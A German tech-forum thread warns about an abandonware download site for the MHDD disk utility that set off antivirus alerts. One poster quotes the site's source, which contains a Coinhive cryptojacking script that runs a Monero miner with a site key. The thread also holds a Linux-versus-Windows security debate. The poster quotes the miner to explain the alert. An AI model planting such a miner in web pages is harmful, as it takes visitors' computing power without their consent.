Forum: PC Hard- und Software Virus, nicht anklicken!


von michael_ (Gast)


Lesenswert?

Hier,

Beitrag "Technics Keyboard Festplatte klonen geht das ?"

schlägt im letzten Beitrag mein AVG-Virenscanner an.

Den Link mit dem DOS-Programm nicht anklicken!!!

: Verschoben durch User
von Mampf F. (mampf) Benutzerseite


Lesenswert?

Drück halt auf den "melden" Link und melde es ...

von michael_ (Gast)


Lesenswert?

Mach mal! Bin gast!

von dolli (Gast)


Lesenswert?

michael_ schrieb:


> Den Link mit dem DOS-Programm nicht anklicken!!!

Da schlägt wohl jeder virenscanner an, ziehe es halt von archive.org

von Magnus M. (magnetus) Benutzerseite


Lesenswert?

Mampf F. schrieb:
> Drück halt auf den "melden" Link und melde es ...

Hab den Eröffnungspost in diesem Thread schon längst gemeldet.

von Horst (Gast)


Lesenswert?

Mampf F. schrieb:
> Drück halt auf den "melden" Link und melde es ...

Den haben Gäste nicht.

von dolli (Gast)


Lesenswert?

michael_ schrieb:



> Den Link mit dem DOS-Programm nicht anklicken!!!

Kann man das eigentlich auch etwas präzisieren? Und weshalb nicht dort 
anmerken wo das tatsächliche oder vermeindliche Übel droht, als Antwort 
auf den Beitrag.

gehts um die Webseite selber?  mybrainwillexplode.com/

oder um eines oder alle der Programme:

mhdd2932.zip
mhdd30-spaces.ru_.zip
mhdd29.zip
MHDD.ver_.3.0.zip
MHDD-2.9.zip


mhdd2932 wurde jdf. gerademal entpackt unter dosemu gestartet
ein clamav fand zuvor nichts aussergewöhnliches zu  berichten.

(Unter dosemu hat das eh keinen zugriff auf Hardware, nur mal gucken was 
was das so anzeigt, solche Programme sind bestens geignet sich ins Knie 
zu schießen auch ohne "viralen" Status)

---

vlt. mal hier gucken, wenns drückt.
http://web.archive.org/web/20041010103625/http://mhddsoftware.com:80/downloads.shtml


Und man muß nicht auf alles klicken was einm vor die Nase gehalten wird 
;)

von michael_ (Gast)


Lesenswert?

dolli schrieb:
> Kann man das eigentlich auch etwas präzisieren? Und weshalb nicht dort
> anmerken wo das tatsächliche oder vermeindliche Übel droht, als Antwort
> auf den Beitrag.

Nein.
Nach dem Anklicken kam sofort die Warnung von AVG.
Ein Computerscan erbrachte BV:Miner-T(Tri).
Bei mir war es der erste Virus seit 20 Jahren.
Nur Mut, klick doch drauf.

von Mike (Gast)


Lesenswert?

michael_ schrieb:
> Bei mir war es der erste Virus seit 20 Jahren.
> Nur Mut, klick doch drauf.


Ich surfe seit 20 Jahren mit einem Linux-Livesystem.
Das startet sauber von einer CD und beim Ausschalten
wird alles geloescht, was sich evtl. eingenistet hat.

Interessante Dateien speichere ich auf einen Stick.
den ich mit einem AV-Scanner pruefe,
bevor ich ihn in einen andere Rechner stecke,
aber bisher war noch nie was Boeses drauf.

Linux-Welt bringt in jedem Heft Live-Systeme,
da kann man verschiedene ausprobieren und sich eins
aussuchen. Zur Zeit probiere ich gerade das PORTEUS-
Livesystem aus Heft 6/2018.

von dolli (Gast)


Lesenswert?

michael_ schrieb:
> dolli schrieb:
>> Kann man das eigentlich auch etwas präzisieren? Und weshalb nicht dort
>> anmerken wo das tatsächliche oder vermeindliche Übel droht, als Antwort
>> auf den Beitrag.
>
> Nein.

Nein?

Also man macht einen neuen thread auf und keinen Hinweis an der Stelle 
an man ggf. draufklickt.

> Nach dem Anklicken kam sofort die Warnung von AVG.
> Ein Computerscan erbrachte BV:Miner-T(Tri).
> Bei mir war es der erste Virus seit 20 Jahren.
> Nur Mut, klick doch drauf.

Falls es den gibt geht er meinem browser jdf. anscheinend am 
allerwertesten vorbei.

Die Datei mhdd2932.zip wurde jdf. von virustotals 59 scannern nicht 
beanstandet, man kann diese auch an anderen Stellen finden.

https://www.virustotal.com/de/file/55278058ce0caa88dec6fee08f25fd78abad27df9b68c9d15ecd8310203e6394/analysis/



k.A. ob das als link klappt.

von Dirk K. (merciless)


Lesenswert?

While trying to retrieve the URL:
http://mybrainwillexplode.com/abandonware/util/diag/mhdd-2-9-mhdd-3-0-chs-hard-drive-test-utility/
The content is blocked due to the following condition:
Die URL die Sie öffnen wollen ist durch den Inhaltsfilter gesperrt.
Sollten Sie die Sperre für nicht gerechtfertigt halten können Sie
uns unter xxx@yyy.zz kontaktieren. Ihre EDV-Abteilung
Report:
Blocked Category (Hacking/Computer Crime)

;)

merciless

von dolli (Gast)


Lesenswert?

Mal mit curl in eine Datei gespeichert und zu virustotal hochgeladen.
Das mit dem URL direkt angeben funktioniert irgendwie nicht richtig

33/56

https://www.virustotal.com/de/file/4bcf411b5ccc5e29e3c6c0b76f43922ed943129fffd6bc2d4714cf924b26fc33/analysis/1543917891/

JS abschalten oder Bogen darum machen, SORRY :)

von Dr. Sommer (Gast)


Lesenswert?

Mike schrieb:
> Interessante Dateien speichere ich auf einen Stick.

Klingt furchtbar lästig. Du hast beim Arbeiten dann immer 2 Computer am 
Laufen? Code-Snippets von Stackoverflow, Programme, Libraries müssen 
immer erst per Stick übertragen werden? Wie machst du denn 
Versionskontrolle, immer Diffs kopieren? Off-Site-Backups nehmen dann 
auch immer den Umweg über eine externe Platte?

von Dr. Sommer (Gast)


Lesenswert?

Mike schrieb:
> den ich mit einem AV-Scanner pruefe,

Und was machst du mit Viren, welche den Scanner selbst angreifen? 
Bekanntlich haben die so viele Sicherheitslücken dass sie den Rechner 
eher unsicherer machen...

von Mike (Gast)


Lesenswert?

Dr. Sommer schrieb:
> Klingt furchtbar lästig.


Kommt drauf an, was man im Netz macht.
Ich spiele nicht, sondern klicke nur Sachseiten an
oder diskutiere in Foren wie diesem. Dabei surfe ich mit einem Notebook 
ohne Festplatte und lade interessante Dateien wie sie kommen auf den 
Stick,
den ich später geordnet auf eine Festplatte öbertrage.

Sehr oft bin ich sogar zu faul, den Stick mit Scanner zu prüfen,
weil es bei Linux nur höchst selten Malware gibt.
Das ist alles überhaupt nicht lästig, sondern im Gegenteil sehr bequem,
weil ich mir seit 20 Jahren absolut keine Gedanken über Viren
und son Zeugs mache, obwohl ich fast täglich im Netz bin.

von Dr. Sommer (Gast)


Lesenswert?

Mike schrieb:
> Dabei surfe ich mit einem Notebook
> ohne Festplatte und lade interessante Dateien wie sie kommen auf den
> Stick,
> den ich später geordnet auf eine Festplatte öbertrage.

Und was wenn du an einer längeren Diskussion teilnimmst und 
Code-Snippets austauschst? Dann musst du die ja ständig hin und her 
kopieren um sie ausprobieren zu können.

Mike schrieb:
> Das ist alles überhaupt nicht lästig, sondern im Gegenteil sehr bequem,
> weil ich mir seit 20 Jahren absolut keine Gedanken über Viren
> und son Zeugs mache, obwohl ich fast täglich im Netz bin.

Ich auch, hatte seit 20 Jahren kein Virus obwohl ich diesen Zirkus nicht 
mache. Unter Windows benutze ich auch nur noch den Windows Defender. 
Tägliche Backups sind natürlich Pflicht.

Wie installierst du überhaupt Updates auf dem Arbeitsrechner? Diese sind 
ja sehr wichtig um ggf. verseuchte per USB-Stick übertragene Dateien 
abzuwehren. Solche Exploits können Virenscanner oft nicht gut 
identifizieren.

von Mike (Gast)


Lesenswert?

Dr. Sommer schrieb:
> Unter Windows benutze ich auch ...

Windows???
Ist das diese Mistbrühe voller Viren?
Muss ja einer krank sein,
wenn er sich sowas freiwillig reinzieht.

von Dr. Sommer (Gast)


Lesenswert?

Mike schrieb:
> Ist das diese Mistbrühe voller Viren?

Meines Wissens liefert Microsoft standardmäßig keine Viren mit. Und wenn 
man nicht gleich jeden Mail-Anhang öffnet bekommt man auch nicht so 
schnell welche.

Mike schrieb:
> Muss ja einer krank sein,
> wenn er sich sowas freiwillig reinzieht.

Es hat sich viel gebessert. Win10 ist fast schon bedienbar. Und manche 
Software läuft halt nur unter Windows.

von Nano (Gast)


Lesenswert?

Mike schrieb:
> Dr. Sommer schrieb:
>> Unter Windows benutze ich auch ...
>
> Windows???
> Ist das diese Mistbrühe voller Viren?
> Muss ja einer krank sein,
> wenn er sich sowas freiwillig reinzieht.

In deinem Fall liegt das Problem eher vor dem Bildschirm, wenn du mit 
einem Betriebssystem nicht umgehen kannst und nur deswegen von Windows 
zu Linux gewechselt bist.

Viren bzw. Schadsoftware kann man für jedes Betriebssystem schreiben und 
Sicherheitslücken können auch in jedem Betriebssystem und in jeder 
Software vorkommen.
Eine Rechtetrennung zwischen Nutzer und Admin gibt es jedenfalls schon 
seit Windows NT 3.5 erstmals erschienen ist.
Und halbwegs sichere Defaulteinstellungen gibt es seit dem SP2 (oder 
war's SP3?) für Windows XP.
Address space layout randomization gibt's seit Windows Vista.
Und so etwas wie UAC innerhalb der grafischen Oberfläche hat ein Linux 
Deskop System bis heute nicht in ausgereifter Form, da ist X.ORG die 
Sicherheitslücke.
Das wird es erst mit Wayland geben, aber bis das standardmäßig in jeder 
Distri verwendet wird und bspw. auch die proprietären NVidia Treiber das 
unterstützen, wird es noch dauern.
Ein paar weitere Sicherheitsmerkmale gab es dann noch mit Windows 8x auf 
Kernelebene. Bei Windows 10 weiß ich es gerade eben nicht.


Ich bin übrigens Linux und Windows Nutzer gleichermaßen und finde 
Fanboyismus dämlich. Deswegen habe ich dir das geschrieben.
Ich habe sogar auch ein FreeBSD im Einsatz.

von Rufus Τ. F. (rufus) Benutzerseite


Lesenswert?

Nano schrieb:
> schon seit Windows NT 3.5

Tatsächlich schon länger, seit NT 3.1, das vor einem Vierteljahrhundert 
auf den Markt kam.

von dolli (Gast)


Lesenswert?

OS spielt hier keine Rolle und ein Virus ist das ja eigentlich auch 
nicht.
Das ist auch nicht versteckt.

Eher unberechtigtes und unerwünschtes nutzen der cpu/gpu
Wobei der Webseitenbesitzer evtl. garnicht weis da sich der key auf 
wenigstens 154 weiteren Webseiten findet.

Nicht falsch verstehen ich will und brauch das auch nicht!

1
aus source der betr. Seite
2
3
</body></html><script src="https://coinhive.com/lib/coinhive.min.js"></script>
4
<script type="text/javascript">
5
        var miner = new CoinHive.Anonymous("XoWXAWvizTNnyia78qTIFfATRgcbJfGx");
6
        miner.setThrottle(0.1);
7
        miner.start();
8
</script>


unauthorized-coin-mining-browser

https://www.paloaltonetworks.com/resources/blogs/unit42-unauthorized-coin-mining-browser.html

von dolli (Gast)


Lesenswert?

coinhive.com/documentation/miner
1
... The Coinhive JavaScript Miner lets you embed a Monero miner directly into your website. The miner itself does not come with a User Interface – it's your responsibility to tell your users what's going on and to provide stats on mined hashes...
2
3
4
... While it's possible to run the miner without informing your users, we strongly advise against it. You know this. Long term goodwill of your users is much more important than any short term profits.
5
6
... The miner runs until you explicitely stop it again or the user navigates away...

von Nano (Gast)


Lesenswert?

Rufus Τ. F. schrieb:
> Nano schrieb:
>> schon seit Windows NT 3.5
>
> Tatsächlich schon länger, seit NT 3.1, das vor einem Vierteljahrhundert
> auf den Markt kam.

Ja, hast recht.

Ich war mir jetzt nicht mehr so sicher, welche NT Version jetzt genau 
die erste war.
Ich habe daher geraten ohne nachzusehen.

von Nano (Gast)


Lesenswert?

dolli schrieb:
> Eher unberechtigtes und unerwünschtes nutzen der cpu/gpu
> Wobei der Webseitenbesitzer evtl. garnicht weis da sich der key auf
> wenigstens 154 weiteren Webseiten findet.
>
>...
>
> 
https://www.paloaltonetworks.com/resources/blogs/unit42-unauthorized-coin-mining-browser.html

Das perfide an der ganzen Sache ist, dass Javascript Webworker bei 
Firefox  in  about:performance gar nicht zugehörig zur Seite angezeigt 
werden.
D.h. selbst wenn man bemerkt, dass die Leistung der CPU irgendwie runter 
geht, wird die Ursache dafür nicht in der about:performance Seite 
angezeigt.
Man kann nur von einem Tool des Betriebssystems, das die CPU Auslastung 
anzeigt, auf den gesamten Firefox Prozess schließen.
https://de.wikipedia.org/wiki/Web_Worker

Ich hoffe das sich das mit einer zukünftigen Firefox Version ändert und 
auch Webworker Skripte in about:performance aufgezeigt werden.
Denn so wie es jetzt ist, könnte eine Webseite praktisch unbemerkt einen 
Miner laufen lassen ohne das der Nutzer es schnell merkt die Ursache in 
der Webseite zu finden.


Meine Empfehlung wäre daher momentan so wenige Webseiten wie nur möglich 
offen zu halten. Und das ist leider leichter als getan, wenn man es 
gewohnt ist, dutzende Webseiten in Firefoxfenstern und Tabs offen zu 
halten.

Eventuell gibt es auch Plugins um solche Scripte aufzuspüren.
Bis dahin nutze ich noscript, aber solange man keinen Codeaudit der 
Javascripte macht, könnten auch die erlaubten Scripte Minern sein.

von Dirk K. (merciless)


Lesenswert?

Nano schrieb:
> Ich hoffe das sich das mit einer zukünftigen Firefox Version ändert und
> auch Webworker Skripte in about:performance aufgezeigt werden.

Wird wohl mit V64 kommen:
https://www.heise.de/newsticker/meldung/Firefox-Browser-bekommt-Task-Manager-4232790.html

merciless

von Volker (Gast)


Lesenswert?

Mike schrieb:
> Ich surfe seit 20 Jahren mit einem Linux-Livesystem.
> Das startet sauber von einer CD und beim Ausschalten
> wird alles geloescht, was sich evtl. eingenistet hat.

Hallo Mike,

so arbeitet es sich etwas komfortabler:
https://www.vkldata.com/Benutzerfreundliche-Live-Systeme-mit-SATA-DOM

von M.M.M (Gast)


Lesenswert?

Volker schrieb:
> Mike schrieb:
>> Ich surfe seit 20 Jahren mit einem Linux-Livesystem.
>> Das startet sauber von einer CD und beim Ausschalten
>> wird alles geloescht, was sich evtl. eingenistet hat.
>
> Hallo Mike,
>
> so arbeitet es sich etwas komfortabler:
> https://www.vkldata.com/Benutzerfreundliche-Live-Systeme-mit-SATA-DOM

Nö, da ist nix komfortabel dran. Mal abgesehen davon, daß DOM deutlich 
höher im Preis als eine DVD oder ein Stick sind: Zum Update darf man die 
SSD aus
dem Rechner/Laptop frickeln und den Schalter umlegen oder wie? oder soll 
man sich einen (E)Sata Slot ans Laptop flanschen? Nö, da will einer 
seine privat durchaus gangbare Lösung verallgemeinern.

Einfacher als System auf einem USB-Stick und dieses dann in den Speicher 
laden, danach den Stick ziehen, geht kaum. Und Geschwindigkeitsmäßig 
hält das locker mit.

MfG

von Nano (Gast)


Lesenswert?

Dirk K. schrieb:
> Nano schrieb:
>> Ich hoffe das sich das mit einer zukünftigen Firefox Version ändert und
>> auch Webworker Skripte in about:performance aufgezeigt werden.
>
> Wird wohl mit V64 kommen:
> 
https://www.heise.de/newsticker/meldung/Firefox-Browser-bekommt-Task-Manager-4232790.html
>
> merciless

Das sieht gut aus. Gefällt mir.

Bitte melde dich an um einen Beitrag zu schreiben. Anmeldung ist kostenlos und dauert nur eine Minute.
Bestehender Account
Schon ein Account bei Google/GoogleMail? Keine Anmeldung erforderlich!
Mit Google-Account einloggen
Noch kein Account? Hier anmelden.